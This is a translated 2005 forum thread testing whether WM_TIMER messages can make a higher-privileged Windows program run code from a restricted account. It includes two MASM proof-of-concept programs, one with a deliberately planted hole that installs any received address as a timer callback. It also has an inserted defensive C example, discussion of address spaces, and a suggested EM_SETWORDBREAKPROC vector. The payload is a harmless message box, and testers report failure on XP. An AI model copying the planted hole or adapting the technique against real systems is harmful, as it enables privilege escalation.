
Help! WM_TIMER is a barn door!!!

 
Hello Profaner..

Does anyone feel like testing whether [...] is generally fixed in XP?

- Programming a service isn't strictly necessary for this: start a normal program with RUN AS (also possible with PrivAktivate) as admin and run the attacker program in an account with restricted rights.
- Insert a timer into the main program (it naturally must have a window).
- In the attacker program, write a procedure that outputs a message box, but don't let the proc run.
- Determine the address of the procedure with ProcAddr.
- With PostMessage (or perhaps SendMessage), send WM_TIMER with the address of the attacker program's procedure to the main program.

Does that work???

 
05/20/05  
 



Hey, no comments? No interest in testing this??

Let me translate: according to the article, it is possible, using the WM_TIMER message, to get a program that uses a timer and has its own window to execute your own code.
If these programs run under a different account than mine (e.g. as an interactive service), that code would be executed with the rights of that other account.
You log in as Guest, so to speak, send a WM_TIMER message to the handle of the main window of a running virus scanner or firewall, and can then obtain administrator privileges via a self-written PROC.
Doesn't that make the entire Windows security model absurd?
 
05/20/05  
 



I also only skimmed the article - but understood it the same way you did, AH.

I'm currently writing the ACP of the ODoku - I should read again whether the ProcAddr of external progs is also possible here, or only the ProcAddr of your own procs.

Salve.
 
05/20/05  
 




Frank Abbing
Hi,

I tested it. At least on XP Home, the target program's procedure is not executed in the source program! Instead, the source program is launched over and over again!!!

Attached are my two test programs. To test, start the source program first and let it run. Then start the target program. Normally - if Andreas is right - a message box should now open in the source program every second. Not so on my machine. I'm curious how it behaves on the other Windows versions...

Attachment: 3 kB, uploaded 05/20/05, 36 downloads
 
05/20/05  
 



Same here: XP Home, XP Pro!

Certainly some cumulative update.

Provided, of course, that Frank's demonstration corresponds to what was claimed.

Salve,
 
05/20/05  
 




Frank Abbing
I tried passing the procedure address via tmprc and via wTimerID (current version). Both with the same result...
Here's the source code:

Source:

.386                   ; minimum processor needed for 32 bit
.model flat, stdcall   ; FLAT memory model & STDCALL calling
option casemap :none   ; set code to case sensitive

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
include    D:\PROGRAMME\masm32\include\debug.inc
includelib D:\PROGRAMME\masm32\lib\debug.lib

szText MACRO Name, Text:VARARG
    LOCAL lbl
    jmp lbl
    Name db Text,0
    lbl:
ENDM

m2m MACRO M1, M2
    push M2
    pop  M1
ENDM

return MACRO arg
    mov eax, arg
    ret
ENDM

WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
TopXY   PROTO :DWORD,:DWORD

.data
szDisplayName db "Quellfenster mit Timer",0
CommandLine   dd 0
hWnd          dd 0
hInstance     dd 0
timer         dd 0
testit        db "Test",0

.code

start:
    invoke GetModuleHandle, NULL ; provides the instance handle
    mov hInstance, eax
    invoke GetCommandLine        ; provides the command line address
    mov CommandLine, eax
    invoke WinMain,hInstance,NULL,CommandLine,SW_SHOWDEFAULT
    invoke ExitProcess,eax       ; cleanup & return to operating system

WinMain proc hInst     :DWORD,
             hPrevInst :DWORD,
             CmdLine   :DWORD,
             CmdShow   :DWORD

    LOCAL wc   :WNDCLASSEX
    LOCAL msg  :MSG
    LOCAL Wwd  :DWORD
    LOCAL Wht  :DWORD
    LOCAL Wtx  :DWORD
    LOCAL Wty  :DWORD

    szText szClassName,"Generic_Class"

    mov wc.cbSize,         sizeof WNDCLASSEX
    mov wc.style,          CS_HREDRAW or CS_VREDRAW or CS_BYTEALIGNWINDOW
    mov wc.lpfnWndProc,    offset WndProc      ; address of WndProc
    mov wc.cbClsExtra,     NULL
    mov wc.cbWndExtra,     NULL
    m2m wc.hInstance,      hInst               ; instance handle
    mov wc.hbrBackground,  COLOR_BTNFACE+1     ; system color
    mov wc.lpszMenuName,   NULL
    mov wc.lpszClassName,  offset szClassName  ; window class name
    invoke LoadIcon,hInst,500                  ; icon ID 500 from resources
    mov wc.hIcon,          eax
    invoke LoadCursor,NULL,IDC_ARROW           ; system cursor
    mov wc.hCursor,        eax
    mov wc.hIconSm,        0

    invoke RegisterClassEx, ADDR wc            ; register the window class

    mov Wwd, 500
    mov Wht, 350
    invoke GetSystemMetrics,SM_CXSCREEN        ; get screen width in pixels
    invoke TopXY,Wwd,eax
    mov Wtx, eax
    invoke GetSystemMetrics,SM_CYSCREEN        ; get screen height in pixels
    invoke TopXY,Wht,eax
    mov Wty, eax

    invoke CreateWindowEx,WS_EX_OVERLAPPEDWINDOW,
                          ADDR szClassName,
                          ADDR szDisplayName,
                          WS_OVERLAPPEDWINDOW,
                          Wtx,Wty,Wwd,Wht,
                          NULL,NULL,
                          hInst,NULL
    mov   hWnd,eax                             ; copy return value into handle DWORD

    invoke LoadMenu,hInst,600                  ; load resource menu
    invoke SetMenu,hWnd,eax                    ; set it to main window
    invoke ShowWindow,hWnd,SW_SHOWNORMAL       ; display the window
    invoke UpdateWindow,hWnd                   ; update the display

StartLoop:
    invoke GetMessage,ADDR msg,NULL,0,0        ; get each message
    cmp eax, 0                                 ; exit if GetMessage()
    je ExitLoop                                ; returns zero
    invoke TranslateMessage, ADDR msg          ; translate it
    invoke DispatchMessage,  ADDR msg          ; send it to message proc
    jmp StartLoop
ExitLoop:

    return msg.wParam

WinMain endp

; #########################################################################

WndProc proc hWin   :DWORD,
             uMsg   :DWORD,
             wParam :DWORD,
             lParam :DWORD

    .if uMsg == WM_COMMAND

        .if wParam == 1000
            invoke SendMessage,hWin,WM_SYSCOMMAND,SC_CLOSE,NULL
        .elseif wParam == 1900
            szText TheMsg,"Assembler, Pure & Simple"
            invoke MessageBox,hWin,ADDR TheMsg,ADDR szDisplayName,MB_OK
        .endif

    .elseif uMsg == WM_TIMER

        ; behaviour under test: any WM_TIMER whose wParam is not our own
        ; timer id 111 is taken as a callback address and installed as
        ; the TIMERPROC of timer 111, firing every second
        .if wParam != 111
            invoke SetTimer,hWnd,111,1000,wParam
        .endif

    .elseif uMsg == WM_DESTROY

        invoke PostQuitMessage,NULL
        return 0

    .endif

    invoke DefWindowProc,hWin,uMsg,wParam,lParam
    ret

WndProc endp

; ########################################################################

TopXY proc wDim:DWORD, sDim:DWORD

    shr sDim, 1      ; divide screen dimension by 2
    shr wDim, 1      ; divide window dimension by 2
    mov eax, wDim    ; copy window dimension into eax
    sub sDim, eax    ; sub half win dimension from half screen dimension

    return sDim

TopXY endp

; ###################################################################

end start

Target:

.386                   ; minimum processor needed for 32 bit
.model flat, stdcall   ; FLAT memory model & STDCALL calling
option casemap :none   ; set code to case sensitive

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
include    D:\PROGRAMME\masm32\include\debug.inc
includelib D:\PROGRAMME\masm32\lib\debug.lib

szText MACRO Name, Text:VARARG
    LOCAL lbl
    jmp lbl
    Name db Text,0
    lbl:
ENDM

m2m MACRO M1, M2
    push M2
    pop  M1
ENDM

return MACRO arg
    mov eax, arg
    ret
ENDM

WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
TopXY   PROTO :DWORD,:DWORD

.data
szDisplayName db "Zielfenster ohne Timer",0
CommandLine   dd 0
hWnd          dd 0
hInstance     dd 0
timer         dd 0
testit        db "Test",0
fname         db "Quellfenster mit Timer",0   ; window title of the source program (must match exactly)
cname         db "Generic_Class",0            ; window class of the source program

.code

start:
    invoke GetModuleHandle, NULL ; provides the instance handle
    mov hInstance, eax
    invoke GetCommandLine        ; provides the command line address
    mov CommandLine, eax
    invoke WinMain,hInstance,NULL,CommandLine,SW_SHOWDEFAULT
    invoke ExitProcess,eax       ; cleanup & return to operating system

; procedure whose address is sent to the source window; it is never
; called from within this program
timerproc proc
    invoke MessageBox,0,addr testit,addr testit,64
    ret
timerproc endp

WinMain proc hInst     :DWORD,
             hPrevInst :DWORD,
             CmdLine   :DWORD,
             CmdShow   :DWORD

    LOCAL wc   :WNDCLASSEX
    LOCAL msg  :MSG
    LOCAL Wwd  :DWORD
    LOCAL Wht  :DWORD
    LOCAL Wtx  :DWORD
    LOCAL Wty  :DWORD

    szText szClassName,"Generic_Class"

    mov wc.cbSize,         sizeof WNDCLASSEX
    mov wc.style,          CS_HREDRAW or CS_VREDRAW or CS_BYTEALIGNWINDOW
    mov wc.lpfnWndProc,    offset WndProc      ; address of WndProc
    mov wc.cbClsExtra,     NULL
    mov wc.cbWndExtra,     NULL
    m2m wc.hInstance,      hInst               ; instance handle
    mov wc.hbrBackground,  COLOR_BTNFACE+1     ; system color
    mov wc.lpszMenuName,   NULL
    mov wc.lpszClassName,  offset szClassName  ; window class name
    invoke LoadIcon,hInst,500                  ; icon ID 500 from resources
    mov wc.hIcon,          eax
    invoke LoadCursor,NULL,IDC_ARROW           ; system cursor
    mov wc.hCursor,        eax
    mov wc.hIconSm,        0

    invoke RegisterClassEx, ADDR wc            ; register the window class

    mov Wwd, 500
    mov Wht, 350
    invoke GetSystemMetrics,SM_CXSCREEN        ; get screen width in pixels
    invoke TopXY,Wwd,eax
    mov Wtx, eax
    invoke GetSystemMetrics,SM_CYSCREEN        ; get screen height in pixels
    invoke TopXY,Wht,eax
    mov Wty, eax

    invoke CreateWindowEx,WS_EX_OVERLAPPEDWINDOW,
                          ADDR szClassName,
                          ADDR szDisplayName,
                          WS_OVERLAPPEDWINDOW,
                          Wtx,Wty,Wwd,Wht,
                          NULL,NULL,
                          hInst,NULL
    mov   hWnd,eax                             ; copy return value into handle DWORD

    invoke LoadMenu,hInst,600                  ; load resource menu
    invoke SetMenu,hWnd,eax                    ; set it to main window
    invoke ShowWindow,hWnd,SW_SHOWNORMAL       ; display the window
    invoke UpdateWindow,hWnd                   ; update the display

    ; locate the source window by class name and title, then send it
    ; WM_TIMER carrying the address of timerproc in both wParam and lParam
    invoke FindWindow,addr cname,addr fname
    .if eax != 0
        invoke SendMessage,eax,WM_TIMER,addr timerproc,addr timerproc
    .endif

StartLoop:
    invoke GetMessage,ADDR msg,NULL,0,0        ; get each message
    cmp eax, 0                                 ; exit if GetMessage()
    je ExitLoop                                ; returns zero
    invoke TranslateMessage, ADDR msg          ; translate it
    invoke DispatchMessage,  ADDR msg          ; send it to message proc
    jmp StartLoop
ExitLoop:

    return msg.wParam

WinMain endp

; #########################################################################

WndProc proc hWin   :DWORD,
             uMsg   :DWORD,
             wParam :DWORD,
             lParam :DWORD

    .if uMsg == WM_COMMAND

        .if wParam == 1000
            invoke SendMessage,hWin,WM_SYSCOMMAND,SC_CLOSE,NULL
        .elseif wParam == 1900
            szText TheMsg,"Assembler, Pure & Simple"
            invoke MessageBox,hWin,ADDR TheMsg,ADDR szDisplayName,MB_OK
        .endif

    .elseif uMsg == WM_DESTROY

        invoke PostQuitMessage,NULL
        return 0

    .endif

    invoke DefWindowProc,hWin,uMsg,wParam,lParam
    ret

WndProc endp

; ########################################################################

TopXY proc wDim:DWORD, sDim:DWORD

    shr sDim, 1      ; divide screen dimension by 2
    shr wDim, 1      ; divide window dimension by 2
    mov eax, wDim    ; copy window dimension into eax
    sub sDim, eax    ; sub half win dimension from half screen dimension

    return sDim

TopXY endp

; ########################################################################

end start
 
05/20/05  
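As an added illustration from the defensive side (my own code, not from this thread or from XProfan): a C model of what the source program's WndProc should do with WM_TIMER instead of installing wParam as a TIMERPROC. It assumes local stand-ins for the Win32 types and constants so it compiles without windows.h, and the injected values in main are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define WM_TIMER 0x0113u               /* real Win32 message number */
typedef uintptr_t WPARAM;              /* local stand-ins for the Win32 types */
typedef intptr_t  LPARAM;
typedef void (*TIMERPROC)(unsigned timer_id);

#define MAX_TIMERS 4
static struct { unsigned id; TIMERPROC proc; } g_timers[MAX_TIMERS];
static size_t g_timer_count;
static unsigned g_ticks, g_rejected;   /* observable outcome for a test */

/* Stands in for the app's own SetTimer call: records id -> callback. */
int register_timer(unsigned id, TIMERPROC proc) {
    if (g_timer_count == MAX_TIMERS || proc == NULL) return 0;
    g_timers[g_timer_count].id = id;
    g_timers[g_timer_count].proc = proc;
    g_timer_count++;
    return 1;
}

static void on_tick(unsigned id) { (void)id; g_ticks++; }

/* Hardened WM_TIMER dispatch. The thread's source program instead does
 * SetTimer(hWnd,111,1000,wParam) for every wParam != 111, installing a
 * message-supplied value as a code pointer. Here wParam is only a lookup
 * key, and lParam (where Windows carries the callback) is never called. */
int window_proc(unsigned msg, WPARAM wParam, LPARAM lParam) {
    (void)lParam;
    if (msg != WM_TIMER) return 0;     /* other messages not modelled */
    for (size_t i = 0; i < g_timer_count; i++) {
        if (g_timers[i].id == (unsigned)wParam) {
            g_timers[i].proc(g_timers[i].id);
            return 1;                  /* our own timer fired */
        }
    }
    g_rejected++;                      /* unknown id: worth logging, but inert */
    return 0;
}

unsigned ticks_seen(void)    { return g_ticks; }
unsigned rejected_seen(void) { return g_rejected; }

int main(void) {
    register_timer(111, on_tick);
    window_proc(WM_TIMER, 111, 0);                  /* legitimate tick */
    window_proc(WM_TIMER, 0x401000, 0x401000);      /* constructed injected values */
    printf("ticks=%u rejected=%u\n", ticks_seen(), rejected_seen());
    return 0;
}
```

On current Windows the OS side is closed as well: services no longer share the interactive desktop (session 0 isolation) and UIPI blocks window messages from lower-integrity processes, but a program that treats message parameters as code addresses is still its own bug.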
 




CB
XP Pro SP2: same result as Frank.
 
XProfan 8/9.1, Win XP, AMD 64/3200
05/21/05  
 



I tested the thing with a different message and within a local process. The given address really is jumped to.

Fortunately, it isn't quite that simple:
Every process has (if I've understood it correctly) its own private address space. So an address you determine always relates only to the current process. For the process I want to attack to know which address it should start, you'd probably have to investigate, map and calculate a bit. The article does indeed talk about a debugger...
 
05/21/05  
 




Jörg Sellmeyer
Nothing at all happens on my machine.
Win98SE / XProfan9
 
Windows XP SP2 XProfan X4
... and here's something completely different from Profan ...
05/21/05  
 



Hello Jörg...

It can't, either; the address doesn't fit.
 
05/21/05  
 




Frank Abbing
Hi,

> It can't, either; the address doesn't fit.

The address does fit. I checked. The source program does indeed receive the address. It's just that when installing the timer, Windows XP bends the address around to the start point of its own program. Under 98, on the other hand, the timer apparently isn't started at all.
 
05/21/05  
 



Hello Frank...

I suspect that the address one can get there is a virtual address that always relates to the current process. (Do I see that right? With your MASM knowledge you'll know that better than me in any case.) I suspect that one first has to have the real address of the procedure in memory. After that one could perhaps convert the obtained address for the process to be attacked, but for that one would also first have to know its real memory address. How do you see it?

Oh yes..., the EM_SETWORDBREAKPROC message should likewise be usable to jump to foreign code - that might be easier to test.
 
05/21/05  
 



